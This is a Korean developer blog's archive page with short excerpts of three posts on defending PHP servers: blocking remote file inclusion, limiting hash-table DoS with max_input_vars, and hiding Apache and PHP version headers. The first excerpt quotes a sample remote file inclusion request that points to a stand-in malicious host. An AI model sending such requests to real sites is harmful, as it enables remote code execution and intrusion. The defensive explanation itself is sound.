일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | |
7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | 23 | 24 | 25 | 26 | 27 |
28 | 29 | 30 |
- 주식
- linux
- 공모주 청약
- codeigniter
- 코드이그나이터
- 오라클
- MYSQL
- css
- php
- Stock ipo
- SQL
- html
- JavaScript
- 공모주 청약 일정
- 주식 청약
- jquery
- 6월 공모주 청약 일정
- Eclipse
- 7월 공모주 청약 일정
- 자바
- 제이쿼리
- 주식 청약 일정
- 맥
- IPO
- 리눅스
- Oracle
- java
- Stock
- 공모주
- 자바스크립트
- Today
- Total
목록2020/06/18 (3)
개발자의 끄적끄적
![](http://i1.daumcdn.net/thumb/C150x150/?fname=https://blog.kakaocdn.net/dn/APLu2/btqESH8cLRK/JPwNTRCwPHRTnUu1NkRmJ0/img.jpg)
[PHP]인젝션 공격 방어 대책 최근에 간간이 발생되는 취약점 중 하나가 php injection입니다. 로그를 보시면 이런식으로 공격이 들어가죠.. local/test.php?param=http://malicious_text/hack.txt PHP 프로그래밍 중 주의해야 할 것이 바로 PHP Injection 취약점입니다. 대한민국의 많은 게시판 및 웹 솔루션들이 바로 이 취약점에 무력화됩니다. 원격지의 파일을 로컬의 파일처럼 실행하는데 문제가 있습니다. 아래와 같이 코딩을 하게되면 param값으로 들어온 내용을 include()함수가 실행하여 처리하게 됩니다. 그런데 여기서 param값으로 전달되는 내용이 내부파일인지 외부파일인지를 설정에 따라 실행하게 됩니다. ( php.ini 설정에서 allow_..
[php] php에서 hash table DoS(HashDoS) 공격 방어 [펌] 웹서버에서는 Request POST, GET 변수를 hash 구조로 관리한다. 그런데 POST 요청 파라미터수가 상당히 많을 경우(GET 요청은 길이 제한이 있으므로 문제가 되지 않음)에 hash 충돌이 많이 발생하게 되어 CPU load가 상당히 올라가게 된다. 이런 문제는 PHP5, Asp.Net, Java, V8 자바스크립트 엔진 등에서 발생한다. 취약점을 해결하거나 공격을 약화시키는 방법이다. 1. php 5.4.0 RC버전과 앞으로 나올 PHP 5.3.9 버전 (취약점 해결) max_input_vars 설정으로 파라미터 개수를 제한한다. 2. 기존 php버전에서 (완벽한 해결이 아닌 공격을 약화시키는 방법) php..
![](http://i1.daumcdn.net/thumb/C150x150/?fname=https://blog.kakaocdn.net/dn/GHbRv/btqEQ6Bh7AJ/0gMs7Sodp07xQSGUIWg9K0/img.png)
Apache && PHP 버전 노출 제거 (Ubuntu) [펌] Apache && PHP Header Version 노출 패키지로 설치시 Default로 Apache, PHP Version이 Header에 노출되는 경우가 있다. 노출시 OS, Engine, Version을 통하여 관련된 취약점을 알아볼 수 있으므로 불필요한 정보 노출은 꼭!! 제거해주자. 띠용!! 본글은 Ubuntu 14.04 Server 기반으로 합니다. Description: Ubuntu 14.04.5 LTS Release: 14.04 Codename : Trusty [index.html (사진 잘 안보이면 확대해서 보세용)] 단순히 Chrome Browser를 통하여 HTTP Headers 확인할 수 있다. 현재 index.html..